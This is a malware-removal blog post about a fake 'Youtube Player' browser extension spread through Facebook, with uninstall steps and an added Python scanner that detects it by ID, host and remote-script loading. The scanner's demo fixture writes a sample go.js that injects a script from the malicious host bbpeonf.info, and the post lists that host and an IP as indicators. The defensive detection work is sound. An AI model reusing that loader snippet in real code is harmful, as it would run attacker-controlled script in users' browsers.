Malware Removal Instructions


Wednesday, 11 January 2012

Malicious Youtube Extension, YXH-youtube_player.xpi and YXH-youtube_player.crx (Uninstall Guide)

Posted on 15:56 by Unknown
Cyber criminals have spammed out a malicious web browser extension attack posing as a Youtube Player. Malicious web browser extensions called YXH-youtube_player.xpi and YXH-youtube_player.crx, which infect Mozilla Firefox and Google Chrome, are currently spreading through Facebook. Attackers rely mostly on social engineering to spread their malicious extensions. This noxious campaign gets a lot worse when infected users post links on websites that use the Facebook Comments Box. At least the links that lead to the fake youtube websites are non-clickable.



The bit.ly link redirects users to a website impersonating youtube.com. The user is then prompted via a pop-up to click a notification and then install a Youtube HD Player.



Actually, you don't even need to click the notification: the download of the malicious extension starts automatically.



It goes without saying that you shouldn't install add-ons from websites that you don't trust. Unfortunately, it seems that people are willing to do whatever it takes to watch videos that have caught their attention. After all, this is what social engineering attacks are all about.

YXH-youtube_player.crx (Youtube Player 6.1.8) extension installed in Google Chrome:



Extension's files:



Let's take a look inside go.js to see how key functions are implemented.


As you can see, it loads another JavaScript file, http://bbpeonf.info/script.js, which at the time we investigated this threat redirected us to 50.56.234.67/s.js.


The malicious browser extension YXH-youtube_player.xpi is currently detected by only 2 of the 42 antivirus engines available on VirusTotal (VT report: YXH-youtube_player.xpi). ESET detects this extension as JS/TrojanClicker.Agent.NDA and Fortinet detects it as W32/Agent.FBH!phish.

As far as I know, programs classified as JS.Trojan-Clicker are designed to increase the number of visits to certain sites in order to boost the hit count for online ads, to conduct denial-of-service attacks on particular servers, or simply to redirect victims to infected websites. One way or another, you need to remove such malicious web browser extensions from your computer immediately. To remove JS/TrojanClicker.Agent.NDA from your computer, please follow the removal instructions below. If you have any questions, please leave a comment below. Good luck and be safe online!


Remove YXH-youtube_player.xpi in Mozilla Firefox:

1. Open Mozilla Firefox. Go to Tools → Add-ons.



2. Select Extensions. Choose Youtube Player 6.1.8 and click the Uninstall button.




Remove YXH-youtube_player.crx in Google Chrome:

1. Click the Customize and control Google Chrome icon and select Tools → Extensions.



2. Choose Youtube Player 6.1.8 and click the Remove button.



Finally, scan your computer with anti-malware software.


Associated Youtube Player 6.1.8 files:
  • C:\Documents and Settings\[User]\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jsgfrtofdhsjrelrjmspsjrtdcrslsjsnrt\6.1.8_0
  • C:\Documents and Settings\[User]\Application Data\Mozilla\Firefox\Profiles\o45jfr56.default\extensions\admin@youtubeplayer.com
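The two things worth checking on a machine you suspect are the extension IDs listed above and the behaviour seen in go.js, namely a bundled script that injects a second-stage script from a remote http URL at runtime. The following is an added example written for this post, not code from the post or from any vendor: it walks an unpacked Chrome Extensions directory or a Firefox extensions directory, reads each Chrome manifest.json for a display name, scans every bundled .js file (and the contents of packed .xpi files, which are plain zip archives), and flags an extension when its directory name matches a known ID, when a script references one of the hosts named above, or when a script both references a remote URL and contains a script-loading pattern. The regexes are deliberately broad heuristics and the on-disk layout (Chrome `<id>/<version>/manifest.json`, Firefox `<id>/` or `<id>.xpi`) is an assumption; the sample tree it builds in a temporary directory is constructed for the demonstration and is not the real extension.

```python
import json
import re
import tempfile
import zipfile
from pathlib import Path

# Indicators taken from the post: the Chrome extension directory name, the
# Firefox add-on ID, and the hosts that go.js pulled its second-stage script from.
KNOWN_BAD_IDS = {"jsgfrtofdhsjrelrjmspsjrtdcrslsjsnrt", "admin@youtubeplayer.com"}
KNOWN_BAD_HOSTS = {"bbpeonf.info", "50.56.234.67"}

# Heuristics (assumed, not from the post): any http(s) URL with its host captured,
# and the usual ways a script injects another script at runtime. Both are broad on
# purpose; hits are leads to review by hand, not verdicts.
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")
LOADER_RE = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)|\.src\s*=|importScripts\(|getScript\(")


def iter_js_sources(entry: Path):
    """Yield (member name, text) for every .js file in an unpacked extension
    directory or inside a packed .xpi (a plain zip). A .crx carries a non-zip
    header in front of the archive and is not handled here."""
    if entry.is_dir():
        for p in entry.rglob("*.js"):
            yield str(p.relative_to(entry)), p.read_text(encoding="utf-8", errors="replace")
    elif entry.suffix.lower() == ".xpi" and zipfile.is_zipfile(entry):
        with zipfile.ZipFile(entry) as z:
            for name in z.namelist():
                if name.lower().endswith(".js"):
                    yield name, z.read(name).decode("utf-8", errors="replace")


def extension_id(entry: Path) -> str:
    """Chrome: <id>/<version>/...; Firefox: <id>/ or <id>.xpi."""
    return entry.stem if entry.suffix.lower() == ".xpi" else entry.name


def display_name(entry: Path) -> str:
    """Best-effort 'name version' from a Chrome manifest.json; '' if none found."""
    if entry.is_dir():
        for m in entry.rglob("manifest.json"):
            try:
                data = json.loads(m.read_text(encoding="utf-8"))
                return f"{data.get('name', '')} {data.get('version', '')}".strip()
            except (OSError, ValueError):
                continue
    return ""


def scan_extension(entry: Path) -> dict:
    """Flag an extension by known ID, by known host, or by the generic pattern of
    loading script from a remote URL at runtime (what go.js did in the post)."""
    ext_id = extension_id(entry)
    hosts, loaders = set(), []
    for name, text in iter_js_sources(entry):
        found = {h.lower() for h in URL_RE.findall(text)}
        hosts |= found
        if found and LOADER_RE.search(text):
            loaders.append(name)
    reasons = []
    if ext_id in KNOWN_BAD_IDS:
        reasons.append("known extension id")
    if hosts & KNOWN_BAD_HOSTS:
        reasons.append("contacts known host: " + ", ".join(sorted(hosts & KNOWN_BAD_HOSTS)))
    if loaders:
        reasons.append("loads remote script in: " + ", ".join(loaders))
    return {"id": ext_id, "name": display_name(entry), "remote_hosts": sorted(hosts), "reasons": reasons}


def scan_extensions_root(root: Path) -> list:
    """Scan every entry directly under an Extensions/ (Chrome) or extensions/ (Firefox)
    directory and return only the suspicious ones."""
    results = [scan_extension(p) for p in sorted(root.iterdir())]
    return [r for r in results if r["reasons"]]


def build_sample_root(root: Path) -> Path:
    """Constructed sample tree (not the real extension): one entry mimicking the
    layout and go.js behaviour described in the post, one benign entry."""
    bad = root / "jsgfrtofdhsjrelrjmspsjrtdcrslsjsnrt" / "6.1.8_0"
    bad.mkdir(parents=True)
    (bad / "manifest.json").write_text(json.dumps({"name": "Youtube Player", "version": "6.1.8"}))
    (bad / "go.js").write_text(
        "var s = document.createElement('script');\n"
        "s.src = 'http://bbpeonf.info/script.js';\n"
        "document.head.appendChild(s);\n")
    good = root / "benignextensionidaaaaaaaaaaaaaaaa" / "1.0_0"
    good.mkdir(parents=True)
    (good / "manifest.json").write_text(json.dumps({"name": "Notes", "version": "1.0"}))
    (good / "main.js").write_text("document.title = 'notes';\n")
    return root


def demo_scan() -> list:
    """Build the constructed sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_extensions_root(build_sample_root(Path(tmp)))


if __name__ == "__main__":
    for hit in demo_scan():
        print(hit)
```

To run it against a real profile, point `scan_extensions_root` at the `Extensions` directory under the Chrome user data path or the `extensions` directory under the Firefox profile (the two paths listed above on Windows XP; they differ on later Windows versions). An extension flagged only by the generic remote-loading heuristic deserves a manual look at the named script before removal, since legitimate add-ons also fetch remote content.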